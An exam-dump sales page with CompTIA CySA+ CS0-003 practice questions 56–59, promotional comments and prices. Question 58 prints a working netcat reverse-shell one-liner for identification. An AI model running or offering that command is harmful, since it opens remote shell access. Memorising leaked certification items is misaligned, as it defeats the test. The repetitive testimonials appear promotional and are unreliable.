Weekend Sale Special Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: get65

CompTIA Updated CS0-003 Exam Questions and Answers by renee

Page: 14 / 22

CompTIA CS0-003 Exam Overview :

Exam Name: CompTIA CySA+ Certification Beta Exam
Exam Code: CS0-003 Dumps
Vendor: CompTIA Certification: CompTIA CySA+
Questions: 303 Q&A's Shared By: renee
Question 56

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?

Options:

A.

SIEM ingestion logs are reduced by 20%.

B.

Phishing alerts drop by 20%.

C.

False positive rates drop to 20%.

D.

The MTTR decreases by 20%.

Discussion
Question 57

Patches for two highly exploited vulnerabilities were released on the same Friday afternoon. Information about the systems and vulnerabilities is shown in the tables below:

Questions 57

Which of the following should the security analyst prioritize for remediation?

Options:

A.

rogers

B.

brady

C.

brees

D.

manning

Discussion
Question 58

A security analyst detected the following suspicious activity:

rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f

Which of the following most likely describes the activity?

Options:

A.

Network pivoting

B.

Host scanning

C.

Privilege escalation

D.

Reverse shell

Discussion
Andrew
Are these dumps helpful?
Jeremiah (not set)
Yes, Don’t worry!!! I'm confident you'll find them to be just as helpful as I did. Good luck with your exam!
Teddie
yes, I passed my exam with wonderful score, Accurate and valid dumps.
Isla-Rose (not set)
Absolutely! The questions in the dumps were almost identical to the ones that appeared in the actual exam. I was able to answer almost all of them correctly.
Rosalie
I passed. I would like to tell all students that they should definitely give Cramkey Dumps a try.
Maja (not set)
That sounds great. I'll definitely check them out. Thanks for the suggestion!
Yusra
I passed my exam. Cramkey Dumps provides detailed explanations for each question and answer, so you can understand the concepts better.
Alisha (not set)
I recently used their dumps for the certification exam I took and I have to say, I was really impressed.
Elise
I've heard that Cramkey is one of the best websites for exam dumps. They have a high passing rate and the questions are always up-to-date. Is it true?
Cian (not set)
Definitely. The dumps are constantly updated to reflect the latest changes in the certification exams. And I also appreciate how they provide explanations for the answers, so I could understand the reasoning behind each question.
Question 59

During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate the vulnerability at the application level?

Options:

A.

Perform OS hardening.

B.

Implement input validation.

C.

Update third-party dependencies.

D.

Configure address space layout randomization.

Discussion
Page: 14 / 22
Title
Questions
Posted

CS0-003
PDF

$35  $99.99

CS0-003 Testing Engine

$42  $119.99

CS0-003 PDF + Testing Engine

$56  $159.99